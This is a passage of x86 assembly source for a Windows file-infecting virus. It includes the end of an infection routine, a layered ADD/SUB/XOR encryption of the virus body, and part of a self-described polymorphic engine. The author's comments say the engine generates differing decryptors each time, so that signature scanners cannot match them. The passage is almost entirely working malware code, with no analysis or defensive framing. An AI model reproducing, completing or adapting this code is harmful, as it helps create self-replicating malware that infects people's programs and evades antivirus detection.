call dword ptr [ebp+RVA_CloseHandle]
@@End2: push dword ptr [ebp+FileAttributes]
lea ebx, [ebp+FileName]
push ebx
call dword ptr [ebp+RVA_SetFileAttributesA]
@@End: ret
InfectFile endp
TextHeader dd 0
RelocHeader dd 0
LastHeader dd 0
StartOfLastSection dd 0
PEHeaderAddress dd 0
EncryptWhileStoring proc
@@EncryptLoop: mov edx, 2
lodsd
@@Loop_001: cmp byte ptr [ebp+edx+EncryptType], 1
jb @@ADD
jz @@SUB
@@XOR: xor eax, dword ptr [4*edx+ebp+DecryptKey]
jmp @@Next
@@ADD: add eax, dword ptr [4*edx+ebp+DecryptKey]
jmp @@Next
@@SUB: sub eax, dword ptr [4*edx+ebp+DecryptKey]
@@Next: dec edx
jns @@Loop_001
stosd
loop @@EncryptLoop
ret
EncryptWhileStoring endp
CreateEncryptions proc
pusha
@@Again: call Random
jz @@Again
mov [ebp+DecryptKey], eax
@@Again2: call Random
jz @@Again2
cmp [ebp+DecryptKey], eax
jz @@Again2
mov [ebp+DecryptKey+4], eax
@@Again3: call Random
jz @@Again3
cmp [ebp+DecryptKey], eax
jz @@Again3
cmp [ebp+DecryptKey+4], eax
jz @@Again3
mov [ebp+DecryptKey+8], eax
mov ecx, 3
@@OtraVez: call Random
and al, 3
jz @@OtraVez
dec al
mov byte ptr [ebp+ecx+EncryptType-1], al
loop @@OtraVez
popa
ret
CreateEncryptions endp
EncryptType db 0, 0, 0 ; 0=ADD, 1=SUB, 2=XOR
DecryptKey dd 0, 0, 0
; Help with stack positions
S_EAX equ 1Ch
S_ECX equ 18h
S_EDX equ 14h
S_EBX equ 10h
S_ESP equ 0Ch
S_EBP equ 08h
S_ESI equ 04h
S_EDI equ 00h
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; Dumb polymorphic engine :) ;;
;; Just made only to avoid having the same decryptors every time. ;;
;; It has been made in two hours or so, so it isn't very complex. ;;
;; That's very easy to emulate, but I wasn't in the mood to make ;;
;; a bigger one in a weekend (well, just wait for the finishing ;;
;; of the eternally durable coding of the Tuareg engine :P ) ;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; EAX=Displacement from the beginning till the virus
; ECX=Place where the decryptors must be put
; Size of encrypted part is Virus_Size+1000h
PutDecryptors proc
pusha
mov [ebp+Distance], eax
mov [ebp+DecryptorsBeginAddress], ecx
mov edi, ecx
mov byte ptr [ebp+NumberOfDecryptor], 0
; Initializing of the random generator
lea eax, [ebp+offset SystemTimeReceiver]
push eax
call dword ptr [ebp+RVA_GetSystemTime]
mov eax, [ebp+DwordAleatorio1]
xor eax, [ebp+DwordAleatorio2]
mov [ebp+DwordAleatorio3], eax ; We make it slow poly
@@MakeNextDecryptor:
; Register selection
@@Select1: call Random
and al, 7
cmp al, 4
jz @@Select1
mov [ebp+KeyRegister], al
mov dl, al
@@Select2: call Random
and al, 7
cmp al, 4
jz @@Select2
cmp al, dl
jz @@Select2
mov [ebp+CounterRegister], al
mov dh, al
@@Select3: call Random
and al, 7
cmp al, 4
jz @@Select3
cmp al, dh
jz @@Select3
cmp al, dl
jz @@Select3
mov [ebp+IndexRegister], al
lea ebx, [ebp+offset PutCounterValue]
lea ecx, [ebp+offset PutIndexValue]
lea edx, [ebp+offset PutKeyValue]
call RandomCalling
mov [ebp+InicLoop], edi
movzx ecx, byte ptr [ebp+NumberOfDecryptor]
mov al, byte ptr [ebp+4*ecx+EncryptType]
cmp al, 1
jb @@ADD
jz @@SUB
@@XOR: mov al, 31h
jmp @@J_001
@@ADD: mov al, 29h ; Just the inverse of ADD
jmp @@J_001
@@SUB: mov al, 01h
@@J_001: stosb